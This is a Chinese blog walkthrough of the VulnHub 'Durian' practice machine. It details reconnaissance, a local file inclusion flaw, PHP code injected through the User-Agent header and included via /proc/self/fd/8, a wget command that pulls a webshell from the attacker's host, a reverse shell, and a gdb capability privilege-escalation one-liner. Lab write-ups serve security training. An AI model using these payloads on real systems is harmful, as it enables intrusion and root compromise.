Durian靶机

最新推荐文章于 2023-03-14 21:03:23 发布
最新推荐文章于 2023-03-14 21:03:23 发布
阅读量275 收藏
点赞数 1
分类专栏: 靶机 文章标签: php python shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/118334519
版权

Durian靶机

arp-scan -l 扫描靶机IP地址

nmap -sV -Pn -A x.x.x.131

打开80端口

dirb进行目录扫描,能看到有wp-admin,那么就知道后台是wordpress

Nikto扫描,发现了/blog/wp-login.php,验证了上面的猜测。

既然有wordpress那就用wpscan来扫描

wpscan --url http://x.x.x.131/blog/ --enumerate u

通过这个命令来枚举用户名

密码最终没有爆破出,爆破失败后,改变思路,重新检查目录

访问

发现文件包含漏洞

读取/etc/passwd,发现可以利用

http://x.x.x.131/cgi-data/getImage.php?file=php://filter/read=convert.base64-encode/resource=../blog/wp-content/index.php 这段base64并没什么用

继续利用ezpzLFI工具来做本地文件包含的爆破

找到了上面的三个文件。

重新整理了一下本地文件包含的利用思路:由于/proc/self/fd/8中会记录user agent,所以考虑http请求头的user agent中加入php命令,然后本地文件包含/proc/self/fd/8文件,文件会被当成php代码来解析,实现命令执行。

开始实验:首先通过burp将user agent里面加入php命令<?php system('id');?>

发送请求,检查/proc/self/fd/8文件,里面看到了命令的回显

本地用python起个http服务

Burp里在user agent那里输入<?php system('wget http://攻击级IP/shell1.php -O /var/www/html/blog/shell2.php');?>

执行命令后,在/var/www/html/blog目录下生成了shell2.php这个木马,

kali上获取了反弹shell

获取交互式的shell

做一波信息搜集 发现有两个可登录的用户。

sudo发现ping命令,

发现不需要加sudo也能执行ping命令,这里就考虑ping命令有capability

所以执行getcap -r / 2>/dev/null来查看一共有哪些命令拥有capability

发现gdb命令有setuid的capability

执行gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit 获得root权限

提权成功,查看flag

xzhome
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Durian:基于Python的代码检查工具,暂时支持一些简单的静态漏洞检查和基于clang对c系列语言解析为抽象语法树(抽象语法树)进行破坏性缺陷分析检查
03-23
[目录] 榴莲 0x01,简介(介绍) Durian工具是一个基于libclang的个性化代码检测工具。 1),忘记日志打印等异常明显的问题,可以通过正则表达式直接匹配出。可以通过xml文件添加匹配规则,针对不同类型的问题,进行不同的逻辑处理,如是否打印了日志,虚函数2),基于libclang,利用clang对C族语言进行词法分析和语法分析。将生成原始生成对应的AST,通过遍历AST来分析函数内部可能存在的变量重复赋值问题。 0x02,功能(特点) 多语言支持(支持多种开发语言) 支持C系列(基于libclang),JAVA,PHP,等开发语言以及伪代码检测,并支持数十种类型文件。 支持的多个漏洞(支持多个漏洞类型) 临时开放几条突破规则匹配,用户可以自定义,后续将继续更新。 CLI / API模式(命令行模式和API模式) 暂时提供CLI模式,用户可以自己添加API,WEB扩展。 0
durian_project
04-10
"Durian_Project"是乌普萨拉大学基因组分析课程的一个项目,旨在让学习者实践和理解基因组数据的分析方法。项目的核心可能是基于一篇相关的学术文章,虽然具体的文章名称未提供,但我们可以假设它涉及了基因组学、...
vulnhub靶场,Durian
kukudeshuo的博客
07-23 320
vulnhub靶场,Durian 环境准备 靶机下载地址:https://www.vulnhub.com/entry/durian-1,553/ 攻击机:kali(192.168.109.128) 靶机Durian(192.168.109.140) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.140 使用nmap扫描差点目标靶机端口开放情况
vulnhub:Durain靶机
qq_63283137的博客
09-13 159
每个端口都需进行探测,但8000是nginx代理,信息归属真实的80端口。Wordpress探测工具—wpscan:可以探测admin用户与信息,可用于登录。1.搜索kali同一网段的存在的ip地址:192.168.72.129。发现端口下的web目录,再基于端口进行尝试访问下面每个web目录。准备:部署好Durain靶机,并设置网络配置为nat模式。刷新,查看代码,即可获取到了 / 下的目录。尝试查看etc/passwd的用户信息文件。查看代码,看出访问日志用户。针对扫描出的端口分析。
VulnHub渗透测试实战靶场-Durian:1
LYJ20010728的博客
08-20 1271
VulnHub渗透测试实战靶场-Durian:1环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.141 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
【VulnHub系列】Durian靶机
薛定谔嘚喵博客
03-14 159
1)信息收集1、nmap信息挖掘。2、挖掘HTTP服务信息。3、搜寻页面有用的信息(在页面中F12看见有文件包含漏洞,查看/etc/passwd文件,发现包含成功。已经找到文件包含的位置了,但是没有文件上传的位置,那只能考虑写入木马到日志文件,然后利用文件包含漏洞去包含日志文件即可网上查找资料发现Durian的默认日志文件路径为/var/log/durian.log/access.log(也是Apache日志文件))2)再利用bp抓包,修改UA写入一句话木马
Durian:github客户端
05-14
Duriangithub客户端
durian:榴莲Debian部署者
05-10
Durian是一套工具,用于自动安装基于Debian的操作系统,特别是Ubuntu。 您可以创建部分Debian软件包归档镜像,轻松设置PXE网络启动并定义几个自定义模板。 最后,您只需一个命令即可部署系统。 部署可以在物理机或...
durian-管理后台UI样式框架
最新发布
04-08
"Durian"是一个专为管理后台设计的UI样式框架,其目标是提供一套高效、美观且易用的界面元素和布局方案,以帮助开发者快速构建功能完善的后台管理系统。这个框架通常包含一系列预定义的CSS样式、JavaScript组件以及...
DurIAN:“用于多模式合成的持续时间通知注意网络”的实现(https
03-31
状态:已发布1个信息DurIAN是用于文本到语音合成任务的编码器-解码器体系结构。 与Tacotron 2等以前的体系结构不同,它不学习注意力机制,而是考虑音素持续时间信息。 因此,当然,要使用此模型,应具有音素化和...
VulnHub-Durian靶机详细渗透过程
MRS_jianai的博客
01-01 719
VulnHub-Durian靶机详细渗透过程
Vulnhub靶机——DOUBLE: 1
qq_51295120的博客
03-18 4009
靶机下载链接在这 VMware和VirtualBox进行互通可参考:Vulnhub靶机——SHENRON: 1 1.主机发现: netdiscover -r 172.16.10.0/24 -i eth0 2. 信息收集: 使用nmap进行全端口服务版本扫描: nmap -n -T5 -p- -sV -sS 172.16.10.212 发现靶机服务器开启了四个端口:22,25,80,8080;其中有80和8080都是http服务 3. 渗透测试 这里有两个超链接:Production和TEST 点击Pr
vulnhub-durian
HEAVEN569的博客
02-14 815
靶机:durian 下载地址:http://www.vulnhub.com/entry/durian-1,553/ 实验机:kali 2020 windows 10 1.信息收集 1.nmap信息收集 sudo nmap -sS -sV -sC 10.7.184.0/24 //收集信息 得到信息 目标的ip:10.7.184.6 开启的端口和服务 22/tcp ssh , 80/tcp http ,8088/tcp radan-http 7080/t......
关于“Durian”调查问卷的心得体会
diaoruman5062的博客
03-11 128
这周我们做了项目着手前的客户需求调查,主要以调查问卷的方式进行。其实做问卷调查并不是想象中的那么简单,首先要确定问卷调查的内容,每一个问题都要经过深思熟虑,字字斟酌,既要切合问卷主要目的,又要简洁扼要。但是经过团队中的每一位小伙伴的努力,多次讨论后最终拟定了调差问卷的内容(问题设置)。确定调查问卷的内容后,团队中的每一位小伙伴通过各种方式收集数据,老师要求100份有效的数据,...
『CTF Tricks』PHP-妙用/proc/self/fd触发LFI日志包含完成RCE命令执行([羊城杯 2021]Only 4非预期解)
Ho1aAs‘s Blog
09-12 1625
文章目录前言利用原理参考完 前言 此Trick的使用面非常窄,只适用于特定环境,这里只做特例分析,在后续服务器复现中,fd目录下没有指向日志的文件描述符,若有错误请指出 利用 ?gwht=/proc/self/fd/8&cmd=system('cat /flag'); 'user-agent': '<?php eval($_GET[cmd]);?>' /proc/self/fd/x -> /var/log/nginx/access.log include("/proc/self/
渗透测试学习之靶机DC-4
xdbzdgx的博客
11-18 3681
1.下载靶机 本篇文章是DC靶机系列的第四篇,针对的是靶机DC-4,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-4的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-4只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到ro
https证书
weixin_33762321的博客
01-26 91
2019独角兽企业重金招聘Python工程师标准>>> ...
/proc/self/目录的意义
热门推荐
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
DurIAN模型介绍
09-18
DurIAN (DurIAN: Duration Informed Attention Network) 是一个基于 Transformer 的语音合成模型,它具有时长感知的注意力机制。该模型的主要目标是解决语音合成中的时长预测问题,即如何准确地预测每个音素的持续...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值